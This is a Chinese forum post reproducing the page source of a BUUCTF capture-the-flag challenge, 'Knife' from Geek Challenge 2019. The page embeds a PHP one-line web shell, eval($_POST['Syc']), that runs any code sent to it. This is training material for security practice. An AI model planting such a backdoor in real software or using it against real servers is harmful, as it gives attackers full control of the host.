登录后更精彩...O(∩_∩)O...
您需要 登录 才可以下载或查看,没有账号?立即注册
×
BUUCTF靶场11 --[极客大挑战 2019]Knife
上源码:
[PHP] 纯文本查看 复制代码 <!DOCTYPE html>
<html>
<?php
eval($_POST["Syc"]);
?>
<style>
p,h1 {
cursor: default;
}
</style>
<head>
<meta charset="utf-8">
<title>白给的shell</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
<h1 style="font-family:verdana;color:red;text-align:center;">我家菜刀丢了,你能帮我找一下么</h1><br><br><br>
<p style="font-family:arial;color:red;font-size:20px;text-align:center;">eval($_POST["Syc"]);</p>
<div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
</body>
</html>
|